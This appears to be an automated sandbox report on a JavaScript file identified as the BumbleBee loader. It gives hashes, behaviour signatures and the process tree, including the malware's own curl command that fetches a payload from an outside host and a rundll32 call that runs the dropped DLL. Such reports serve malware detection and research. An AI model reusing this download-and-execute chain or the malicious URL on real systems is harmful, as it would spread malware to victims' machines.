Resubmissions

14-03-2024 12:52

240314-p38qwacd8v 10

14-03-2024 12:51

240314-p3p9jacd7w 7

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-03-2024 12:52

General

  • Target

    sonveastrit.js

  • Size

    15KB

  • MD5

    517affe6e5fe79afcf4f49cb46d8a3cc

  • SHA1

    bb44562c59f77c63c1fa1fa28ba67d064eed2ad0

  • SHA256

    8c169aa9c23673c84cbea07e7ef8fdd7f2458856f8dfcdb5c1723e9a20a79b0d

  • SHA512

    81bb3f498baf5c012173a0dedd7981ed4747649f8dd010f4fa8d2f2b75ea574e337dd0306a7546307455bc02f0599f959e85ff041d8fbb7a42f5660a1f05f473

  • SSDEEP

    384:j1pkU3o9kMw9bLSXfm96YPnA3AQzkkBRBYOC72lN:Ef9sLvAzxh

Malware Config

Extracted

Family

bumblebee

Botnet

asd1234

rc4.plain

Signatures

  • BumbleBee

    BumbleBee is a loader malware written in C++.

  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\sonveastrit.js
    1⤵
    • Checks computer location settings
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\howeathermsych.sonapitheip.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:820
      • C:\Windows\system32\curl.exe
        curl "https://cmskk.guruygn.com/h/5.16.25/8b3fa8dd-6771-38b6-b487-4b05ef4b2b3f/p/386.php" --output "C:/Users/Admin/AppData/Local/coundispbernalould.careastakentelfirdin" --ssl-no-revoke --insecure --location
        3⤵
          PID:4320
      • C:\Windows\System32\rundll32.exe
        "C:\Windows\System32\rundll32.exe" "C:/Users/Admin/AppData/Local/whessistarddrafferseeta.nuasseonerch" HUF_inc_var
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious use of NtCreateThreadExHideFromDebugger
        PID:4520

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\coundispbernalould.careastakentelfirdin

      Filesize

      3.6MB

      MD5

      402829ed22e8fa54eaa8a5adc0e47839

      SHA1

      d292171c9d9803c3619933d35524d0f6cd3194d0

      SHA256

      fbd3570c98fbd3b3bf71a9b20c9039637035868ae747af7d3a19468f55445806

      SHA512

      06ef0c4cd84d0fee47179414879eb9812ffd98c2ae490737ccf6a67a883104008267f9d5425a3e381a8621de5fcb6b682399ad2e808f55660c7507dc55df9179

    • C:\Users\Admin\AppData\Local\howeathermsych.sonapitheip.bat

      Filesize

      207B

      MD5

      5e2ca42b6e1114d6001ca0dcc06b3592

      SHA1

      537278094a481b3f385b6e47edaf655b78aff66c

      SHA256

      9f3c8ebd8cd0f9c1e22317caf6de64ce5eb97949ed71bd80ac604d68bd902ee1

      SHA512

      0130f9a683a122b671fb9126fb2d498787f674ecfb4dcfb467a7e2b24f4917cf7a590aa56c028b16fdbe33efe774680fa93b17ca20a55e4102498d6dc8a3b668

    • memory/4520-7-0x00000177E55B0000-0x00000177E57C8000-memory.dmp

      Filesize

      2.1MB

    • memory/4520-8-0x00000177E5370000-0x00000177E55A7000-memory.dmp

      Filesize

      2.2MB

    • memory/4520-9-0x00007FFBCC450000-0x00007FFBCC645000-memory.dmp

      Filesize

      2.0MB

    • memory/4520-10-0x00007FFBCC450000-0x00007FFBCC645000-memory.dmp

      Filesize

      2.0MB

    • memory/4520-11-0x00007FFBCC450000-0x00007FFBCC645000-memory.dmp

      Filesize

      2.0MB

    • memory/4520-12-0x00007FFBCC450000-0x00007FFBCC645000-memory.dmp

      Filesize

      2.0MB

    • memory/4520-13-0x00000177E55B0000-0x00000177E57C8000-memory.dmp

      Filesize

      2.1MB

    • memory/4520-14-0x00007FFBCC450000-0x00007FFBCC645000-memory.dmp

      Filesize

      2.0MB